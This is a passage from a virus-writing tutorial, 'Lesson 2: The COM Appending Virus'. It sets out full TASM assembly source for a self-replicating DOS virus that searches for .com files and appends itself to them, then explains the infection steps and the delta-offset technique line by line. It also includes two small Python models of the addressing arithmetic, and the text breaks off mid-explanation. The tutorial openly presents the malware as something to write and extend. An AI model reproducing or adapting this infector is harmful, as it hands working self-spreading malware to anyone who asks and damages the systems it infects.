Lesson 2
The COM Appending Virus
By Horny Toad

In the first lesson, we discussed how to write the most basic form of virus, the overwriting virus. This type of virus has serious deficiencies which, I hope, should be very obvious to you. Nonetheless, the basic overwriting virus is a necessary stepping stone in the overall virus writing curriculum. The next virus that we will be looking at is the COM appending infector. This virus is a step up in that it infects the host program without destroying it.

As the complexity of the virii increases, so does the complexity of the concepts that pertain to them. With the overwriting virus, we weren't very concerned with the host program, the one that we were infecting, quite simply because it was going to be destroyed. With the appending virus, our ultimate goal is not to harm the host program, but to slightly modify it so that it holds the virus code and is still able to run itself. Therefore, with the appender, you really need to visualize what is happening with your virus code and the effects on the host program. Memory usage and management are going to start playing a bigger part in your virus writing. And you can't relax after learning this virus. With EXE infectors, resident and boot virii, memory will continue to haunt you. Then, once you have a grasp on memory management, I will throw some Windows programming your way and utterly confuse you.

At this stage, just be happy with the virus that is in this tutorial. You have accomplished a great success when you can not only produce appending virii, but really understand what is going on. Don't listen to the people that criticize the shit out of overwriting and COM appenders. Understanding the basic concepts in virus programming will help to build a solid foundation in your coding skills and make the more difficult resident virii easier to grasp.

I have decided to continue with the format that I used in the first lesson to describe this virus.
Therefore, when you are coding in the future and need a quick explanation of a certain technique, you only need to glance at the individual sections of this tutorial. Also, I do expect that you have gone through the first tutorial on overwriting infectors. In keeping with the Codebreaker's idea of easy-to-understand articles, I will continue to describe all of the basic assembly code, even if it was already touched upon in the first lesson.

I must add that the code in this article is unoptimized for the purpose of instruction. I specifically divided the code up into many different routines so that I could comment on each of them and what they do in the virus itself. I also will add that I code TASM-friendly assembly. I only use Borland's Turbo Assembler. I suggest that you use it. It is very easy to understand and the majority of virii out there are written with TASM in mind. If you still want to use MASM or some other assembler, fine, just make sure that you know the format that your code has to be in.

After I published the last tutorial, I received a few complaints that people didn't fully understand the use of registers and memory addressing. It was not my goal to completely explain the use of certain complex concepts in the first tutorial. You did not need to know complex memory management to write an overwriter. In this tutorial, I will not be going over hooking interrupts, extended registers, or in-depth flag usage. Such techniques are not needed to understand a COM appender. In the next tutorial, I will be discussing EXE appenders and, in the fourth tutorial, resident virii. Be patient. Wait to understand the more difficult concepts until you need them. Otherwise, you will only get confused.

Well, on with the virus. I will go ahead and give you a copy below of the basic COM appender, so that, throughout the tutorial, you can refer back to the basic skeleton code.
During the explanation of the individual parts of code, I will offer different techniques to accomplish the same results as you see in the basic code. code segment assume cs:code,ds:code org 100h start: db 0e9h,0,0 toad: call bounce bounce: pop bp sub bp,OFFSET bounce first_three: mov cx,3 lea si,[bp+OFFSET thrbyte] mov di,100h push di rep movsb move_dta: lea dx,[bp+OFFSET hide_dta] mov ah,1ah int 21h get_one: mov ah,4eh lea dx,[bp+comsig] mov cx,7 next: int 21h jnc openit jmp bug_out Openit: mov ax,3d02h lea dx,[bp+OFFSET hide_dta+1eh] int 21h xchg ax,bx rec_thr: mov ah,3fh lea dx,[bp+thrbyte] mov cx,3 int 21h infect_chk: mov ax,word ptr [bp+hide_dta+1ah] mov cx,word ptr [bp+thrbyte+1] add cx,horny_toad-toad+3 cmp ax,cx jz close_up jmp_size: sub ax,3 mov word ptr [bp+newjump+1],ax to_begin: mov ax,4200h xor cx,cx xor dx,dx int 21h write_jump: mov ah,40h mov cx,3 lea dx,[bp+newjump] int 21h to_end: mov ax,4202h xor cx,cx xor dx,dx int 21h write_body: mov ah,40h mov cx,horny_toad-toad lea dx,[bp+toad] int 21h close_up: mov ah,3eh int 21h next_bug: mov ah,4fh jmp next bug_out: mov dx,80h mov ah,1ah int 21h retn comsig db '*.com',0 thrbyte db 0cdh,20h,0 newjump db 0e9h,0,0 horny_toad label near hide_dta db 42 dup (?) code ENDS END start Well, that is the basic code that we will be using for the virus. Now, before we get into discussing what the individual lines of code do, let's try to conceptualize what a COM appending virus is. Take a look below at the steps that a COM appending virus takes when executed. Outline of the COM Appending Virus 1. Determine the Delta Offset 2. Restore the infected file's original 3 bytes 3. Set a new DTA address 4. Find a COM file. 5. If none then go to step 16. 6. Open the file. 7. Read and store the first 3 bytes of the file. 8. Check if file has been previously infected. 9. Calculate the size of the jump to main virus body. 10. Move to the beginning of the file. 11. Write the jump to the main virus body. 12. 
Move to the end of the file. 13. Append the virus main body to the end of the file. 14. Close the file. 15. Find next matching file. Back to step 4. 16. Return the DTA to 80 hex and restore control to host program. I swore that I would never include cheesy graphics in my tutorials, but I guess I should, in order to give you a picture of what the virus and the host program look like before and after infection. Toad2 Virus Innocent Program 163 bytes 200 bytes ----------- ----------- = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = ----------- ----------- After Infection 0ffset 100h --------------- =Jump to Virus= =Main Body = - 3 bytes long =-------------= = = The delta offset is the calculation = Innocent = of the amount of space that the virus = Program = main body has moved down past the Innocent = Main Body = program main body. = = = = =-------------= = = = Virus Main = = Body = = = = = = = =Data Section = =of Virus = =--Original---= =--3 bytes of-= =--Innocent---= =--Program----= =-------------= Hopefully, I haven't completely discouraged and confused you. Once the individual sections of code are explained, all of these steps will make sense. Something that you must remember when looking at the virus code is that the virus is currently in its first generation. It hasn't yet infected a file. When you are trying to figure out how the virus code works, you will have to think of it in terms of the first time it runs as well as when the infected program is running. Well, lets have a look at the code. _____________________________________________________________________ code segment The segment directive defines the parameters for a segment. In this instance we are defining the code segment. All of the executable code, the meat of our program will lie inside of the code segment. This segment does not necessarily have to be named "code" segment, but it is only logical, and a good programming convention, to name it the "code" segment. 
If we were dealing with a larger program, one that had many procedures or external calls, we would definitely want to define a specific segment as our data segment, separate from the code. Since this is a very small piece of code, the two will be intermixed.
_____________________________________________________________________
assume cs:code,ds:code
The assume directive lies within the code segment and matches the name that you gave your segment, such as code, with the associated register. In our program, we are stating that the code and data segment registers will be associated with the "code" segment. What does this mean? Basically we are still setting up the parameters of our COM file. We are following convention by defining where things are in our program and how they are set up.

What are the CS and DS registers? The code segment register is going to contain the starting address of your program's code segment. Essentially, it tells your computer where to begin to look for your executable code. The DS register contains the starting address for the data section. Another register that I might as well bring up is the IP or instruction pointer register. The job of the IP is to contain the offset address of the next instruction that is to be executed.

What is an offset address? An offset address is not a true address of a line in your program, but rather a distance away from a given point. If you put the two concepts together, the code segment register combined with the instruction pointer register (written CS:IP) gives you the next instruction to execute in your program. The processor forms the actual address by multiplying CS by 16 and adding IP. The CS will stay constant as the IP counts up through the instructions.
_____________________________________________________________________
org 100h
You should remember this from the overwriting virus. This directive tells the assembler that our virus is a COM file whose code begins at offset 100 hex, or 256 bytes, into its segment. This 100 hex distance is actually the offset directly after the PSP or program segment prefix.
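To make the segment and offset arithmetic concrete, here is a minimal Python sketch of how a real-mode segment:offset pair maps to a physical address. The function name `linear_address`, the constants, and the sample segment value 1234h are hypothetical, chosen only for illustration; DOS picks the actual segment at load time.

```python
# Toy model of real-mode addressing. All names and sample values here
# are illustrative assumptions, not part of the tutorial's listing.

PSP_SIZE = 0x100          # the PSP occupies the first 256 bytes of the segment
COM_ENTRY_OFFSET = 0x100  # a COM program's first instruction follows the PSP


def linear_address(segment: int, offset: int) -> int:
    """Combine a 16-bit segment and 16-bit offset into a 20-bit address."""
    # The segment is shifted left by 4 bits (multiplied by 16), then the
    # offset is added. The mask keeps the result within 20 bits.
    return ((segment << 4) + offset) & 0xFFFFF


if __name__ == "__main__":
    cs = 0x1234  # hypothetical load segment
    ip = COM_ENTRY_OFFSET
    print(f"CS:IP = {cs:04X}:{ip:04X} -> linear {linear_address(cs, ip):05X}")
```

Whatever segment DOS chooses, the offset part stays the same, which is why a COM program can simply assume that it starts at 100h.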
The value 100h is placed in the IP, telling the computer where to begin. The PSP contains information about your program and is created in memory when the program is loaded.
_____________________________________________________________________
start:
db 0e9h,0,0
The first instruction that needs to be coded is the jump to our virus code. In the initial execution of our virus, we only want control to pass to the next line of code, so we define a blank jump. The DB or "define byte" directive is most commonly used in the data section of our virus to define strings of information. In this instance, we are literally defining an assembly instruction manually. The instruction that we are defining is "jump." At the lowest level, the level at which the computer processes code, the instruction "jmp" has been transformed by the assembler to its binary form "11101001." In coding assembly, the preferred numerical system is hexadecimal, so we convert the binary to e9h. No way am I getting into describing how to manually convert bin-dec-hex. I prefer to let my little old Casio do the conversions for me.

Get back on track, Toad. Do you think that the jump instruction stays null once the virus has infected a program? If you answered "No", then congratulations. Once the virus has infected a program, the first instruction in the code of the infected host will be a jump to the main virus body. Each time the virus infects a program, the first 3 bytes, including the jump instruction, will be rewritten with a calculation to jump over the host program to the virus main body. As we progress through the virus, this will all become clearer.
_____________________________________________________________________
toad:
call bounce
bounce:
pop bp
sub bp,OFFSET bounce
The Delta Offset. This is probably the single most important concept that you will have to learn when coding an appending virus. When you assemble the virus for the first time, the assembler calculates the value of all of the offsets.
Once the virus has appended itself to the end of the host program, the offsets that the assembler calculated are now all incorrect. The offsets do not take into account the amount of space the code has moved forward, beyond the host program.

Before we go into the calculation of the delta offset, let's look at the new instructions within this routine. The first is the "call" instruction. If you remember the old BASIC computer language, call is like GOSUB. A call instruction pushes the IP onto the stack and then transfers control to its target. Ok, let's take a look at that last sentence. What does it mean? Who's pushing who? And what the hell is a stack? Don't panic, we are going to take this nice and easy. The stack is a temporary memory location that can be used to store such things as the IP (the address of the next instruction) during a "call". The term "push" means that the data is being moved onto the stack. The opposite of "push" is "pop". The pop instruction merely transfers the data that was most recently pushed onto the stack to a specified destination. Don't freak out on me with this. At this point, this is all I want you to know about the stack: it is a temporary memory location.

On to the calculation. The call instruction pushes the IP, the address of the next instruction, onto the stack. We then pop this address into bp. Then we subtract the original offset of bounce, which was determined when the virus was originally assembled, from the value in bp. The base pointer (bp) is a 16-bit register used for holding certain parameters, in this case, our delta offset. All offset addresses in the main virus body will need to have bp added on to them. During the first generation of the virus, the delta offset, or the bp, will be zero.
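The arithmetic described above can be followed in a small Python toy model. This is only a sketch of the push, pop, and subtract steps, not of any real processor or program. The helper names and the sample addresses (106h as the assembled offset of the label, and a run-time address 200h higher) are hypothetical values picked for illustration.

```python
# Toy model of the call / pop / subtract sequence. Names and sample
# addresses are illustrative assumptions only.

def call(stack: list, return_address: int) -> None:
    """Model of 'call': push the address of the next instruction."""
    stack.append(return_address)


def pop(stack: list) -> int:
    """Model of 'pop': take back the most recently pushed value."""
    return stack.pop()


def delta_offset(runtime_address: int, assembled_offset: int) -> int:
    """Distance between where a label really is and where it was assembled."""
    stack = []
    call(stack, runtime_address)   # call pushes the real address of the label
    bp = pop(stack)                # pop bp retrieves that address
    # sub bp,OFFSET label, wrapped to 16 bits like a real register
    return (bp - assembled_offset) & 0xFFFF


if __name__ == "__main__":
    assembled = 0x0106                       # hypothetical assembled offset
    print(hex(delta_offset(0x0106, assembled)))  # code has not moved
    print(hex(delta_offset(0x0306, assembled)))  # code sits 200h bytes higher
```

When the run-time address equals the assembled offset, the result is zero, which matches the first-generation case. Any other result is the amount that must be added to each assembled offset before it is used.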
_____________________________________________________________________
first_three:
mov cx,3
lea si,[bp+OFFSET thrbyte]
mov di,100h
push di
rep movsb
The first_three routine writes the host program's original
three bytes back to their original location (in memory) at
location 100 hex, the beginning of the program. The
instructions to do this are fairly simple and should look
somewhat familiar. What do the brackets with the